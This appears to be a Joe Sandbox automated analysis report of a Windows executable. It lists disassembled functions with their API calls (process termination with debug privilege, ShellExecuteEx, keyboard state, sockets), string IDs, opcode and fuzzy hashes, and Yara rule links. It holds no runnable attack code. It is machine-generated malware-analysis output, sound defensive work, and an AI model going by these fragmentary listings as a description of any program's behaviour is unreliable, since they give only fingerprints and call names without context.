                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                                • String ID: SysListView32
                                                                                                                                • API String ID: 307300125-78025650
                                                                                                                                • Opcode ID: 040ae1cef8a30b5d80e2c941accaaea451b83e187e6b492f6a5e26cec7328fd9
                                                                                                                                • Instruction ID: f7950a1cc086485eba7b59c14c2ea2c11a92adb892e569d5edb5e3db2eabde7c
                                                                                                                                • Opcode Fuzzy Hash: 040ae1cef8a30b5d80e2c941accaaea451b83e187e6b492f6a5e26cec7328fd9
                                                                                                                                • Instruction Fuzzy Hash: 2A41A371904308ABEB21DF64CC85FEE77B8EF08350F10442BF549A7291D6B59D84EB61
                                                                                                                                Function 00F71620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F56F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F56F7D
                                                                                                                                  • Part of subcall function 00F56F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F56F8D
                                                                                                                                  • Part of subcall function 00F56F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F57022
                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7168B
                                                                                                                                • GetLastError.KERNEL32 ref: 00F7169E
                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F716CA
                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F71746
                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00F71751
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F71786
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                                • Opcode ID: fac6bb5a25612b1515f6feab43830827d5b961d01bd19e1c26ffb5e81b93f5ef
                                                                                                                                • Instruction ID: e602460ead171235ee9efdabdf9a4b42da8b145c7125b95a3e86a0151ab48d15
                                                                                                                                • Opcode Fuzzy Hash: fac6bb5a25612b1515f6feab43830827d5b961d01bd19e1c26ffb5e81b93f5ef
                                                                                                                                • Instruction Fuzzy Hash: 4D41C175600201AFDB04EF58CCA2F6D77A1BF44311F18800AF90A9F292DB78D849EB42
                                                                                                                                Function 00F56237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00F562D6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconLoad
                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                                • Opcode ID: ac190864405522b8c80016a1da289bb725bedaee4eb0850c4cc07562d11c12d1
                                                                                                                                • Instruction ID: 61d342e66980d9e534095b81aa534080674b64984be9190af2e5deb5e3c4e77d
                                                                                                                                • Opcode Fuzzy Hash: ac190864405522b8c80016a1da289bb725bedaee4eb0850c4cc07562d11c12d1
                                                                                                                                • Instruction Fuzzy Hash: 06110D72608347BBDF015B54DC43E6AB39CAF16775F60002EFB11E7282E7A4AA447165
                                                                                                                                Function 00F5757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00F57595
                                                                                                                                • LoadStringW.USER32(00000000), ref: 00F5759C
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F575B2
                                                                                                                                • LoadStringW.USER32(00000000), ref: 00F575B9
                                                                                                                                • _wprintf.LIBCMT ref: 00F575DF
                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F575FD
                                                                                                                                Strings
                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00F575DA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                                • Opcode ID: a12e3620b1cfdc83ed6e3c5e4b2ec2b5882f5930fc702086b49c9e3442e70d96
                                                                                                                                • Instruction ID: c1282d9d5ee357436698685f21da8b9aed9fdf3df212dfc12a5b042ee003dfc1
                                                                                                                                • Opcode Fuzzy Hash: a12e3620b1cfdc83ed6e3c5e4b2ec2b5882f5930fc702086b49c9e3442e70d96
                                                                                                                                • Instruction Fuzzy Hash: CD0112F290020CBFE751A794AD89EE6776CD708301F504497B746D2041EA749EC49B75
                                                                                                                                Function 00F69AC3 Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1718709218-0
                                                                                                                                • Opcode ID: 734985dff3853211b2bec4d314d2876bf671877cd151e52a094564d616057151
                                                                                                                                • Instruction ID: e7676393b9080a22ac4f1b03e3a8296ee2bc34d8d51a91193108595a68ef9a0d
                                                                                                                                • Opcode Fuzzy Hash: 734985dff3853211b2bec4d314d2876bf671877cd151e52a094564d616057151
                                                                                                                                • Instruction Fuzzy Hash: 4471AF71508200AFC710EF64DC45FABB7E8EF89720F20462DF55597291DB74D944EB92
                                                                                                                                Function 00F3B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __mtinitlocknum.LIBCMT ref: 00F3B744
                                                                                                                                  • Part of subcall function 00F38A0C: __FF_MSGBANNER.LIBCMT ref: 00F38A21
                                                                                                                                  • Part of subcall function 00F38A0C: __NMSG_WRITE.LIBCMT ref: 00F38A28
                                                                                                                                  • Part of subcall function 00F38A0C: __malloc_crt.LIBCMT ref: 00F38A48
                                                                                                                                • __lock.LIBCMT ref: 00F3B757
                                                                                                                                • __lock.LIBCMT ref: 00F3B7A3
                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00FC6948,00000018,00F46C2B,?,00000000,00000109), ref: 00F3B7BF
                                                                                                                                • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00F3B7DC
                                                                                                                                • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00F3B7EC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1422805418-0
                                                                                                                                • Opcode ID: 0cf22c8bf89e53f5a660ba40b2c2f679f522274d7061ba119fa313aee9ba45ff
                                                                                                                                • Instruction ID: 4111ef87cbcdd370899342d7f74c128c64125a6fc6a4bf9a8caf0fb848632e2b
                                                                                                                                • Opcode Fuzzy Hash: 0cf22c8bf89e53f5a660ba40b2c2f679f522274d7061ba119fa313aee9ba45ff
                                                                                                                                • Instruction Fuzzy Hash: 9F413671E012099BEB10DF78DC6576CB7A4FF41335F208219EA25AB2D1CB789902EB95
                                                                                                                                Function 00F5A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F5A1CE
                                                                                                                                  • Part of subcall function 00F3010A: std::exception::exception.LIBCMT ref: 00F3013E
                                                                                                                                  • Part of subcall function 00F3010A: __CxxThrowException@8.LIBCMT ref: 00F30153
                                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F5A205
                                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 00F5A221
                                                                                                                                • _memmove.LIBCMT ref: 00F5A26F
                                                                                                                                • _memmove.LIBCMT ref: 00F5A28C
                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00F5A29B
                                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F5A2B0
                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F5A2CF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 256516436-0
                                                                                                                                • Opcode ID: 20faea53d62a3ee4ad9f0e2612a8c811db9452d5776130bb5a251c8e80328f02
                                                                                                                                • Instruction ID: 439590e9b59c9e49c5c6ccb579155de580d6ba0599976b149d2723ab5681da15
                                                                                                                                • Opcode Fuzzy Hash: 20faea53d62a3ee4ad9f0e2612a8c811db9452d5776130bb5a251c8e80328f02
                                                                                                                                • Instruction Fuzzy Hash: DD31A131900109EBCB00EFA4DC86EAEB7B8EF44710F2440A6F904EB256DB74D915EB61
                                                                                                                                Function 00F78CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F78CF3
                                                                                                                                • GetDC.USER32(00000000), ref: 00F78CFB
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F78D06
                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00F78D12
                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F78D4E
                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F78D5F
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F7BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00F78D99
                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F78DB9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                • Opcode ID: 454aeffce10b4c19ed43e19345f39d34e7ac7ff132ea0d68b614d2c7c79121e7
                                                                                                                                • Instruction ID: 9a5b29ddf8eeb85ffecde75d737995f0af27fd37bff007e9bdcd6f3942e8dbbb
                                                                                                                                • Opcode Fuzzy Hash: 454aeffce10b4c19ed43e19345f39d34e7ac7ff132ea0d68b614d2c7c79121e7
                                                                                                                                • Instruction Fuzzy Hash: B0319C72240214BFEB218F51CC8AFEA3FA9EF49761F048056FE08DA191DA759C41DB71
                                                                                                                                Function 00F5C890 Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F5C6A0: __time64.LIBCMT ref: 00F5C6AA
                                                                                                                                  • Part of subcall function 00F141A7: _fseek.LIBCMT ref: 00F141BF
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F5C96F
                                                                                                                                  • Part of subcall function 00F3297D: __wsplitpath_helper.LIBCMT ref: 00F329BD
                                                                                                                                • _wcscpy.LIBCMT ref: 00F5C982
                                                                                                                                • _wcscat.LIBCMT ref: 00F5C995
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F5C9BA
                                                                                                                                • _wcscat.LIBCMT ref: 00F5C9D0
                                                                                                                                • _wcscat.LIBCMT ref: 00F5C9E3
                                                                                                                                  • Part of subcall function 00F5C6E4: _memmove.LIBCMT ref: 00F5C71D
                                                                                                                                  • Part of subcall function 00F5C6E4: _memmove.LIBCMT ref: 00F5C72C
                                                                                                                                • _wcscmp.LIBCMT ref: 00F5C92A
                                                                                                                                  • Part of subcall function 00F5CE59: _wcscmp.LIBCMT ref: 00F5CF49
                                                                                                                                  • Part of subcall function 00F5CE59: _wcscmp.LIBCMT ref: 00F5CF5C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1017551523-0
                                                                                                                                • Opcode ID: ee994075d66b51a29bb27230454374fc05a927dd59fc992c369ce62ed0ea0c7b
                                                                                                                                • Instruction ID: ae4f8081318a70f603330f122576712d0f7b3f19c24486981f2d46a923eaf614
                                                                                                                                • Opcode Fuzzy Hash: ee994075d66b51a29bb27230454374fc05a927dd59fc992c369ce62ed0ea0c7b
                                                                                                                                • Instruction Fuzzy Hash: ECC12DB2D00219AEDF11DF95CC81EDEBBB9EF49310F0040AAF609E6151D7749A88DFA5
                                                                                                                                Function 00F2B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b97997da303beda902e781abe6a6e1adf7e9f33b392623856703f202e19f9b70
                                                                                                                                • Instruction ID: 3fdfb6caa9a1976b3c02ec1092e37a5e5d9fe148d212c7038684fb3edd7159e1
                                                                                                                                • Opcode Fuzzy Hash: b97997da303beda902e781abe6a6e1adf7e9f33b392623856703f202e19f9b70
                                                                                                                                • Instruction Fuzzy Hash: 47719871900519EFCB04DF98DC89EBEBB78FF85324F248159F915AA251C734AA41EFA0
                                                                                                                                Function 00F72121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F7214B
                                                                                                                                • _memset.LIBCMT ref: 00F72214
                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00F72259
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                  • Part of subcall function 00F13BCF: _wcscpy.LIBCMT ref: 00F13BF2
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F72320
                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00F7232F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 4082843840-2766056989
                                                                                                                                • Opcode ID: 06b3b960e50f702904e817756eb06ebc05b2696f7d71757dffd6bfca74156a8a
                                                                                                                                • Instruction ID: 1bf9dab3690e742cb9b6c644774bc7dc57107fbfbcfb31a920f2e08450227a3f
                                                                                                                                • Opcode Fuzzy Hash: 06b3b960e50f702904e817756eb06ebc05b2696f7d71757dffd6bfca74156a8a
                                                                                                                                • Instruction Fuzzy Hash: D6718E71E00619DFCB14EFA4C981A9EBBF5FF48310F10805AE85AAB351DB34AE41DB91
                                                                                                                                Function 00F547DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetParent.USER32(?), ref: 00F5481D
                                                                                                                                • GetKeyboardState.USER32(?), ref: 00F54832
                                                                                                                                • SetKeyboardState.USER32(?), ref: 00F54893
                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F548C1
                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F548E0
                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F54926
                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F54949
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 87235514-0
                                                                                                                                • Opcode ID: fce8abb8aba4967b23683182e03e3ae2535fb8fb9695aea69a1a29f92224a374
                                                                                                                                • Instruction ID: 74e3e8b01f99cb8388946d6c297c45580f5f02477f76184710956fe8f2b2b68c
                                                                                                                                • Opcode Fuzzy Hash: fce8abb8aba4967b23683182e03e3ae2535fb8fb9695aea69a1a29f92224a374
                                                                                                                                • Instruction Fuzzy Hash: BC51E6A09087D53DFB3643248C46BBB7FA95B4631AF088589EAD5464C2C2D8FCCCE750
                                                                                                                                Function 00F545F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetParent.USER32(00000000), ref: 00F54638
